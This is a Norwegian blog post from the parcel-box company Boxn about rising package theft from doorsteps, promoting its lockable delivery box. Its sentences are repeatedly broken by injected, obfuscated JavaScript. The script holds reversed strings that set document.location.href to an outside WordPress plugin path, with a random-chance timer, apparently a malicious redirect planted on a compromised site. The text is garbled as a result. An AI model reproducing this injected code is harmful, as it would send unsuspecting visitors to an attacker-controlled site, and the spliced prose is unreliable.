Tyveri av pakker øker

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docs-internal-guid-a0a9b79f-7fff-fde8-e397-32dbb31ce38c»>Tyveri av pakker fra trappen til kunder har lenge vært et stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort problem i mange ltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and. Nå som flere og flere ønsker at det leveres hjem også her i Norge begynner vi å se at trenden fra utltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andet også kan bli et problem også her. 

I TV2 sin artikkel ble pakken til kunden stjålet etter kun 7 minutter. Kunden selv tror at den som stjal den enten fulgte etter budet eller visste hvordan ruten til budet var. Dersom dette stemmer skapes stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor utrygghet for kunder som ønsker å få varene levert hjem på en trygg og enkel måte. 

Det Helt Hjem sier selv som løsning: 

“I områder som opplever mye tyveri går selskapet over til å levere til utleveringssteder. Husebø-Evensen tror imidlertid ikke pakke tyveriene er organiserte.”

Dette kan umulig være det kundene ønsker. Dersom du har bestilt varer levert hjem til deg, så er en av grunnene for de fleste at de ikke ønsker å bruke tid på å dra i post i butikk for å hente varene. 

Boxn er et sikkert mottakspunkt som står hjemme hos kunden, gjerne som en erstatning for postkassen. Mottaker får melding direkte fra boxn sin når pakken er levert. Med solid lås og sterk metallramme skal det mye til for en tyv å få varene ut av boxn. Få varene levert når som helst på døgnet uten å bekymre deg over at noen kanskje har stjålet pakken din før du rekker å hente den.

Boxn en bedre løsning.

Relaterte artikler

Smart Supply og Boxn!

Boxn har i en lengre periode samarbeidet tett med Smart Supply om utrulling av pakkerterminaler i det norske markedet. Vi har gjennom dette samarbeidet fått

Ny terminal ute hos Helse Vest!

Boxn og Helse Vest IKT har inngått en spennende pilot. Vi var i forrige uke i Bergen og leverte og monterte en MultiBoxn terminal. Denne

MultiBoxn med Aktiv kjøl

Endelig er MultiBoxn med aktiv kjøl på plass hos oss. Disse boksene har vi lenge ønsket å få produsert og levert da dette gir Boxn

nb_NONorwegian